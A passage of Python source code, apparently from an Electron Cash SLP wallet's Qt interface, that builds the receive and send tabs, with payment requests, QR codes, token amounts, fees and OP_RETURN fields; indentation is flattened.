# Hack/Workaround to QDarkStyle bugs; see https://github.com/ColinDuquesnoy/QDarkStyleSheet/issues/169#issuecomment-494647801
self.receive_token_type_combo.setItemDelegate(QStyledItemDelegate(self.receive_token_type_combo))
self.receive_token_type_combo.setFixedWidth(200)
self.receive_token_type_combo.currentIndexChanged.connect(self.on_slptok_receive)
#self.receive_token_type_combo.currentIndexChanged.connect(self.update_buttons_on_seed) # update 'CoinText' button, etc
self.receive_slp_token_type_label = HelpLabel(_('Token Type'), msg)
grid.addWidget(self.receive_slp_token_type_label, 4, 0)
grid.addWidget(self.receive_token_type_combo, 4, 1)
self.receive_slp_amount_e = SLPAmountEdit('tokens', 0)
self.receive_slp_amount_e.setFixedWidth(self.receive_token_type_combo.width())
self.receive_slp_amount_label = QLabel(_('Req. token amount'))
grid.addWidget(self.receive_slp_amount_label, 5, 0)
grid.addWidget(self.receive_slp_amount_e, 5, 1)
self.receive_slp_amount_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
self.receive_amount_e.setFixedWidth(self.receive_token_type_combo.width())
self.receive_amount_label = QLabel(_('Requested &amount'))
self.receive_amount_label.setBuddy(self.receive_amount_e)
grid.addWidget(self.receive_amount_label, 6, 0)
grid.addWidget(self.receive_amount_e, 6, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
if Address.FMT_UI != Address.FMT_SLPADDR:
self.receive_token_type_combo.setDisabled(True)
self.receive_slp_token_type_label.setDisabled(True)
self.receive_slp_amount_e.setDisabled(True)
self.receive_slp_amount_label.setDisabled(True)
else:
self.receive_token_type_combo.setDisabled(False)
self.receive_slp_token_type_label.setDisabled(False)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 6, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([_(i[0]) for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Cash addresses.'),
_('The Bitcoin Cash address never expires and will always be part of this Electron Cash wallet.'),
])
label = HelpLabel(_('Request &expires'), msg)
label.setBuddy(self.expires_combo)
grid.addWidget(label, 7, 0)
grid.addWidget(self.expires_combo, 7, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.hide()
grid.addWidget(self.expires_label, 7, 1)
self.save_request_button = QPushButton(_('&Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('&Clear'))
self.new_request_button.clicked.connect(self.new_payment_request)
weakSelf = Weak.ref(self)
class MyQRCodeWidget(QRCodeWidget):
def mouseReleaseEvent(self, e):
''' to make the QRWidget clickable '''
weakSelf() and weakSelf().show_qr_window()
self.receive_qr = MyQRCodeWidget(fixedSize=200)
self.receive_qr.setCursor(QCursor(Qt.PointingHandCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
buttons.addStretch(1)
grid.addLayout(buttons, 8, 1, 1, -1)
self.receive_requests_label = QLabel(_('Re&quests'))
from .request_list import RequestList
self.request_list = RequestList(self)
self.request_list.chkVisible()
self.receive_requests_label.setBuddy(self.request_list)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
vbox2 = QVBoxLayout()
vbox2.setContentsMargins(0,0,0,0)
vbox2.setSpacing(4)
vbox2.addWidget(self.receive_qr, Qt.AlignHCenter|Qt.AlignTop)
self.receive_qr.setToolTip(_('Receive request QR code (click for details)'))
but = uribut = QPushButton(_('Copy &URI'))
def on_copy_uri():
if self.receive_qr.data:
uri = str(self.receive_qr.data)
self.copy_to_clipboard(uri, _('Receive request URI copied to clipboard'), uribut)
but.clicked.connect(on_copy_uri)
but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
but.setToolTip(_('Click to copy the receive request URI to the clipboard'))
vbox2.addWidget(but)
vbox2.setAlignment(but, Qt.AlignHCenter|Qt.AlignVCenter)
hbox.addLayout(vbox2)
class ReceiveTab(QWidget):
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
slf = weakSelf()
if slf:
slf.check_and_reset_receive_address_if_needed()
if self.main_window.is_slp_wallet:
c, u, x = self.main_window.wallet.get_balance()
bal = c + u - self.main_window.wallet.get_slp_locked_balance()
if bal < 1000:
# if not self.low_balance_warning_shown:
# self.main_window.show_warning("Low BCH balance.\n\nCreating and sending SLP tokens requires Bitcoin Cash to cover transaction fees. We recommend a minimum of 0.0001 BCH to get started.\n\nSend BCH to the address displayed in the 'Receive' tab.")
self.main_window.toggle_cashaddr(1, True)
self.low_balance_warning_shown = False
else:
self.main_window.toggle_cashaddr(2, True)
if Address.FMT_UI == Address.FMT_SLPADDR:
self.main_window.show_slp_addr_btn.setText("Show BCH Address")
else:
self.main_window.show_slp_addr_btn.setText("Show Token Address")
else:
self.main_window.toggle_cashaddr(1, True)
w = ReceiveTab()
w.low_balance_warning_shown = False
w.main_window = self
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.address_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_storage_string(), '')
amount = req['amount']
op_return = req.get('op_return')
op_return_raw = req.get('op_return_raw') if not op_return else None
URI = web.create_URI(addr, amount, message, op_return=op_return, op_return_raw=op_return_raw, token_id=req.get('token_id'))
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
if not self.receive_address:
self.show_error(_('No receiving address'))
if self.receive_token_type_combo.currentData() is not None:
amount = float(self.receive_slp_amount_e.text())
else:
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
kwargs = {}
opr = self.receive_opreturn_e.text().strip()
if opr:
# save op_return, if any
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
kwargs[arg] = opr
if self.receive_token_type_combo.currentData() is not None:
tokenid = self.receive_token_type_combo.currentData()
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, token_id=tokenid, **kwargs)
else:
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, **kwargs)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(self.receive_address)
self.request_list.update()
self.request_list.select_item_by_address(req.get('address')) # when adding items to the view the current selection may not reflect what's in the UI. Make sure it's selected.
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self.top_level_window(), title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
self.receive_token_type_combo.setCurrentIndex(0)
self.receive_slp_amount_e.setText("")
addr = self.wallet.get_unused_address(frozen_ok=False)
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
# New! Since the button is called 'Clear' now, we let them proceed with a re-used address
addr = self.wallet.get_receiving_address()
else:
# Warn if past gap limit.
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None) # We want the current item to always reflect what's in the UI. So if new, clear selection.
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_opreturn_rawhex_cb.setChecked(False)
self.receive_opreturn_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_full_ui_string()
self.receive_address_e.setText(text)
@rate_limited(0.250, ts_after=True) # this function potentially re-computes the QR widget, so it's rate limited to once every 250ms
def check_and_reset_receive_address_if_needed(self):
''' Check to make sure the receive tab is kosher and doesn't contain
an already-used address. This should be called from the showEvent
for the tab. '''
if not self.wallet.use_change or self.cleaned_up:
# if they don't care about change addresses, they are ok
# with re-using addresses, so skip this check.
return
# ok, they care about anonymity, so make sure the receive address
# is always an unused address.
if (not self.receive_address # this should always be defined but check anyway
or self.receive_address in self.wallet.frozen_addresses # make sure it's not frozen
or (self.wallet.get_address_history(self.receive_address) # make a new address if it has a history
and not self.wallet.get_payment_request(self.receive_address, self.config))): # and if they aren't actively editing one in the request_list widget
addr = self.wallet.get_unused_address(frozen_ok=False) # try unused, not frozen
if addr is None:
if self.wallet.is_deterministic():
# creae a new one if deterministic
addr = self.wallet.create_new_address(False)
else:
# otherwise give up and just re-use one.
addr = self.wallet.get_receiving_address()
self.receive_address = addr
self.update_receive_address_widget()
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None)
self.set_receive_address(self.wallet.get_receiving_address(frozen_ok=False))
def show_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window()
self.qr_window.setAttribute(Qt.WA_DeleteOnClose, True)
weakSelf = Weak.ref(self)
def destroyed_clean(x):
if weakSelf():
weakSelf().qr_window = None
weakSelf().print_error("QR Window destroyed.")
self.qr_window.destroyed.connect(destroyed_clean)
self.update_receive_qr()
if self.qr_window.isMinimized():
self.qr_window.showNormal()
else:
self.qr_window.show()
self.qr_window.raise_()
self.qr_window.activateWindow()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.update_receive_address_widget()
def update_receive_qr(self):
if self.receive_token_type_combo.currentData() is not None and self.receive_slp_amount_e.text() is not '':
amount = self.receive_slp_amount_e.text() # if self.receive_slp_amount_e.text() is not '' else None
token_id = self.receive_token_type_combo.currentData()
else:
amount = self.receive_amount_e.get_amount()
token_id = None
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
kwargs = {}
if self.receive_opreturn_e.isVisible():
# set op_return if enabled
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
opret = self.receive_opreturn_e.text()
if opret:
kwargs[arg] = opret
# Special case hack -- see #1473. Omit bitcoincash: prefix from
# legacy address if no other params present in receive request.
if Address.FMT_UI == Address.FMT_LEGACY and not kwargs and not amount and not message:
uri = self.receive_address.to_ui_string()
elif not token_id:
# Otherwise proceed as normal, prepending bitcoincash: to URI
uri = web.create_URI(self.receive_address, amount, message, **kwargs)
else:
uri = web.create_URI(self.receive_address, amount, message, **kwargs, token_id=token_id)
self.receive_qr.setData(uri)
if self.qr_window:
self.qr_window.set_content(self, self.receive_address_e.text(), amount,
message, uri, **kwargs)
if self.is_slp_wallet:
if Address.FMT_UI == Address.FMT_SLPADDR:
self.show_slp_addr_btn.setText("Show BCH Address")
else:
self.show_slp_addr_btn.setText("Show Token Address")
def on_slptok(self):
self.slp_token_id = self.token_type_combo.currentData()
self.payto_e.check_text()
self.slp_amount_e.setText("")
if self.slp_token_id is None:
self.amount_e.setDisabled(False)
self.amount_label.setDisabled(False)
self.max_button.setDisabled(False)
self.fiat_send_e.setDisabled(False)
self.slp_extra_bch_cb.setHidden(True)
self.slp_amount_e.setDisabled(True)
self.slp_max_button.setDisabled(True)
self.slp_amount_label.setDisabled(True)
self.message_opreturn_e.setEnabled(True)
self.opreturn_rawhex_cb.setEnabled(True)
self.opreturn_label.setEnabled(True)
else:
self.slp_extra_bch_cb.setHidden(False)
self.slp_extra_bch_cb.setChecked(False)
self.slp_extra_bch_cb.clicked.emit()
self.slp_amount_e.setDisabled(False)
self.slp_max_button.setDisabled(False)
self.slp_amount_label.setDisabled(False)
tok = self.wallet.token_types[self.slp_token_id]
self.slp_amount_e.set_token(tok['name'][:6],tok['decimals'])
self.message_opreturn_e.setEnabled(False)
self.message_opreturn_e.setText('')
self.opreturn_rawhex_cb.setEnabled(False)
self.opreturn_label.setEnabled(False)
self.update_status()
self.do_update_fee()
def on_slptok_receive(self):
self.receive_slp_amount_e.setText("")
self.receive_amount_e.setText("")
slp_token_id = self.receive_token_type_combo.currentData()
self.update_receive_qr()
if slp_token_id is None:
self.receive_slp_amount_e.setDisabled(True)
self.receive_slp_amount_label.setDisabled(True)
self.receive_amount_e.setDisabled(False)
self.receive_amount_label.setDisabled(False)
self.fiat_receive_e.setDisabled(False)
else:
self.addr_toggle_slp(True)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
self.receive_amount_e.setDisabled(True)
self.receive_amount_label.setDisabled(True)
self.fiat_receive_e.setDisabled(True)
tok = self.wallet.token_types[slp_token_id]
self.receive_slp_amount_e.set_token(tok['name'][:6],tok['decimals'])
def on_slp_extra_bch(self):
if self.slp_extra_bch_cb.isChecked():
self.amount_e.setDisabled(False)
self.amount_label.setDisabled(False)
self.max_button.setDisabled(False)
self.fiat_send_e.setDisabled(False)
else:
self.amount_e.setText('')
self.max_button.setChecked(False)
self.amount_e.setDisabled(True)
self.amount_label.setDisabled(True)
self.max_button.setDisabled(True)
self.fiat_send_e.setDisabled(True)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.parent = self
self.slp_send_tab_widgets = []
if self.is_slp_wallet:
self.slp_amount_e = SLPAmountEdit('tokens', 0)
self.token_type_combo = QComboBox()
if ColorScheme.dark_scheme and sys.platform == 'darwin':
# Hack/Workaround to QDarkStyle bugs; see https://github.com/ColinDuquesnoy/QDarkStyleSheet/issues/169#issuecomment-494647801
self.token_type_combo.setItemDelegate(QStyledItemDelegate(self.token_type_combo))
self.token_type_combo.setFixedWidth(200)
self.token_type_combo.currentIndexChanged.connect(self.on_slptok)
self.token_type_combo.currentIndexChanged.connect(self.update_buttons_on_seed) # update 'CoinText' button, etc
self.slp_send_tab_widgets += [
self.slp_amount_e, self.token_type_combo
]
# NB: the translators hopefully will not have too tough a time with this
# *fingers crossed* :)
msg = "<span style=\"font-weight:400;\">" + _('Recipient of the funds.') + " " + \
_("You may enter:"
"<ul>"
"<li> Bitcoin Cash <b>Address</b> <b>★</b>"
"<li> Bitcoin Legacy <b>Address</b> <b>★</b>"
"<li> Simple Ledger <b>Address</b>"
"<li> <b>Contact name</b> <b>★</b> from the Contacts tab"
"<li> <b>CoinText</b> e.g. <i>cointext:+1234567</i>"
"<li> <b>OpenAlias</b> e.g. <i>satoshi@domain.com</i>"
"</ul><br>"
" <b>★</b> = Supports <b>pay-to-many</b>, where"
" you may optionally enter multiple lines of the form:"
"</span><br><pre>"
" recipient1, amount1 \n"
" recipient2, amount2 \n"
" etc..."
"</pre>")
self.payto_label = payto_label = HelpLabel(_('Pay &to'), msg)
payto_label.setBuddy(self.payto_e)
qmark = ":icons/question-mark-dark.svg" if ColorScheme.dark_scheme else ":icons/question-mark-light.svg"
qmark_help_but = HelpButton(msg, button_text='', fixed_size=False, icon=QIcon(qmark), custom_parent=self)
self.payto_e.addWidget(qmark_help_but, index=0)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter(self.payto_e)
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('&Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
description_label.setBuddy(self.message_e)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg_opreturn = ( _('OP_RETURN data (optional).') + '\n\n'
+ _('Posts a PERMANENT note to the BCH blockchain as part of this transaction.')
+ '\n\n' + _('If you specify OP_RETURN text, you may leave the \'Pay to\' field blank.') )
self.opreturn_label = HelpLabel(_('&OP_RETURN'), msg_opreturn)
grid.addWidget(self.opreturn_label, 3, 0)
self.message_opreturn_e = MyLineEdit()
self.opreturn_label.setBuddy(self.message_opreturn_e)
hbox = QHBoxLayout()
hbox.addWidget(self.message_opreturn_e)
self.opreturn_rawhex_cb = QCheckBox(_('&Raw hex script'))
self.opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
hbox.addWidget(self.opreturn_rawhex_cb)
grid.addLayout(hbox, 3 , 1, 1, -1)
self.send_tab_opreturn_widgets = [
self.message_opreturn_e,
self.opreturn_rawhex_cb,
self.opreturn_label,
]
self.from_label = QLabel(_('&From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_label.setBuddy(self.from_list)
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
if self.is_slp_wallet:
msg = _('Token Amount to be sent.') + '\n\n' \
+ _("To enable make sure 'Address Mode' is set to SLP.") + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
self.slp_amount_label = HelpLabel(_('Token Amount'), msg)
msg = _('Select the SLP token to send.')
self.slp_token_type_label = HelpLabel(_('Token Type'), msg)
grid.addWidget(self.slp_token_type_label, 5, 0)
grid.addWidget(self.token_type_combo, 5, 1)
grid.addWidget(self.slp_amount_label, 6, 0)
hbox = QHBoxLayout()
self.amount_e.setMinimumWidth(195)
self.slp_amount_e.setMinimumWidth(195)
self.slp_amount_e.textEdited.connect(self.update_fee)
hbox.addWidget(self.slp_amount_e)
self.slp_max_button = EnterButton(_("Max"), self.slp_spend_max)
hbox.addWidget(self.slp_max_button)
grid.addLayout(hbox, 6, 1)
self.slp_extra_bch_cb = QCheckBox(_('Also send BCH?'))
self.slp_extra_bch_cb.clicked.connect(self.on_slp_extra_bch)
self.slp_extra_bch_cb.setHidden(True)
grid.addWidget(self.slp_extra_bch_cb, 6, 2)
self.slp_send_tab_widgets += [
self.slp_max_button, self.slp_extra_bch_cb
]
msg = _('BCH amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
self.amount_label = HelpLabel(_('BCH &Amount'), msg)
self.amount_label.setBuddy(self.amount_e)
grid.addWidget(self.amount_label, 7, 0)
hbox = QHBoxLayout()
hbox.addWidget(self.amount_e)
self.max_button = EnterButton(_("&Max"), self.spend_max)
self.max_button.setCheckable(True)
hbox.addWidget(self.max_button)
grid.addLayout(hbox, 7, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 7, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
msg = _('Bitcoin Cash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('F&ee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_e_label.setBuddy(self.fee_slider)
self.fee_slider.setFixedWidth(140)
self.fee_custom_lbl = HelpLabel(self.get_custom_fee_text(),
_('This is the fee rate that will be used for this transaction.')
+ "\n\n" + _('It is calculated from the Custom Fee Rate in preferences, but can be overridden from the manual fee edit on this form (if enabled).')
+ "\n\n" + _('Generally, a fee of 1.0 sats/B is a good minimal rate to ensure your transaction will make it into the next block.'))
self.fee_custom_lbl.setFixedWidth(140)
self.fee_slider_mogrifier()
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
grid.addWidget(self.fee_e_label, 9, 0)
hbox = QHBoxLayout()
hbox.addWidget(self.fee_slider)
hbox.addWidget(self.fee_custom_lbl)
hbox.addWidget(self.fee_e)
hbox.addStretch(1)
grid.addLayout(hbox, 9, 1)
self.preview_button = EnterButton(_("&Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("&Send"), self.do_send)
self.cointext_button = EnterButton(_("Coin&Text"), self.do_cointext)
self.cointext_button.setToolTip(_('Process CoinText, transforming it into a BIP70 payment request.'))
self.clear_button = EnterButton(_("&Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
buttons.addWidget(self.cointext_button)
buttons.addStretch(1)
grid.addLayout(buttons, 11, 1, 1, 3)
self.payto_e.textChanged.connect(self.update_buttons_on_seed) # hide/unhide cointext button, etc
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textChanged.connect(self.update_fee)
self.message_opreturn_e.editingFinished.connect(self.update_fee)
self.opreturn_rawhex_cb.stateChanged.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
if not self.slp_token_id:
enabled = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enabled)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
if self.is_slp_wallet:
hasError = entry_changed_slp()
if hasError == False:
entry_changed_bch()
else:
entry_changed_bch()
def entry_changed_bch():
text = ""
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough BCH" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
slp = self.wallet.get_slp_locked_balance()
if slp > 0:
text += " (" + self.format_amount(slp).strip() + " BCH held in tokens)"
extra = run_hook("not_enough_funds_extra", self)
if isinstance(extra, str) and extra:
text += " ({})".format(extra)
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
opret_color = ColorScheme.DEFAULT
if self.op_return_toolong:
opret_color = ColorScheme.RED
text = _("OP_RETURN message too large, needs to be no longer than 220 bytes") + (", " if text else "") + text
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.message_opreturn_e.setStyleSheet(opret_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textEdited.connect(entry_changed)
self.message_opreturn_e.editingFinished.connect(entry_changed)
self.opreturn_rawhex_cb.stateChanged.connect(entry_changed)
if self.is_slp_wallet:
self.slp_amount_e.textChanged.connect(entry_changed)
self.slp_amount_e.editingFinished.connect(entry_changed)
def entry_changed_slp():
if self.token_type_combo.currentData():
text = ""
name = self.wallet.token_types.get(self.slp_token_id)['name']
decimals = self.wallet.token_types.get(self.slp_token_id)['decimals']
if self.not_enough_funds_slp or self.not_enough_unfrozen_funds_slp:
bal_avail, x, x, x, frozen_amt = self.wallet.get_slp_token_balance(self.slp_token_id, { 'user_config': { 'confirmed_only': False }})
del x
if self.not_enough_funds_slp:
amt_color = ColorScheme.RED
text = "Not enough " + \
name + " tokens (" + \
format_satoshis_plain_nofloat(bal_avail, decimals) + " valid"
if self.config.get('confirmed_only', False):
conf_bal_avail = self.wallet.get_slp_token_balance(self.slp_token_id, self.config)[0]
unconf_bal = bal_avail - conf_bal_avail
if unconf_bal > 0:
text += ", " + format_satoshis_plain_nofloat(unconf_bal, decimals) + " unconfirmed)"
else:
text += ")"
else:
text += ")"
elif self.not_enough_unfrozen_funds_slp:
amt_color = ColorScheme.RED
text = "Not enough unfrozen " + name + " tokens (" + \
format_satoshis_plain_nofloat(bal_avail, decimals) + " valid, " + \
format_satoshis_plain_nofloat(frozen_amt, decimals) + " frozen)"
elif self.slp_amount_e.isModified():
amt_color = ColorScheme.DEFAULT
else:
amt_color = ColorScheme.BLUE
try:
if self.slp_amount_e.get_amount() > (2 ** 64) - 1:
amt_color = ColorScheme.RED
maxqty = format_satoshis_plain_nofloat((2 ** 64) - 1, self.wallet.token_types.get(self.slp_token_id)['decimals'])
text = _('Token output quantity is too large. Maximum {maxqty}.').format(maxqty=maxqty)
except TypeError:
pass
self.statusBar().showMessage(text)
self.slp_amount_e.setStyleSheet(amt_color.as_stylesheet())
if text != "":
return True
return False
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
self.invoice_list.chkVisible()
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.max_button.setChecked(True)
self.do_update_fee()
def slp_spend_max(self):
self.slp_amount_e.setAmount(self.wallet.get_slp_token_balance(self.slp_token_id, self.config)[3])
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
return str(round(fee_rate*100)/100) + " sats/B"
@staticmethod
def output_for_opreturn_stringdata(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
pushes = op_return.split('<push>')
script = "OP_RETURN"
for data in pushes:
if data.startswith("<hex>"):
data = data.replace("<hex>", "")
elif data.startswith("<empty>"):
pass
else:
data = data.encode('utf-8').hex()
script = script + " " + data
scriptBuffer = ScriptOutput.from_string(script)
if len(scriptBuffer.script) > 223:
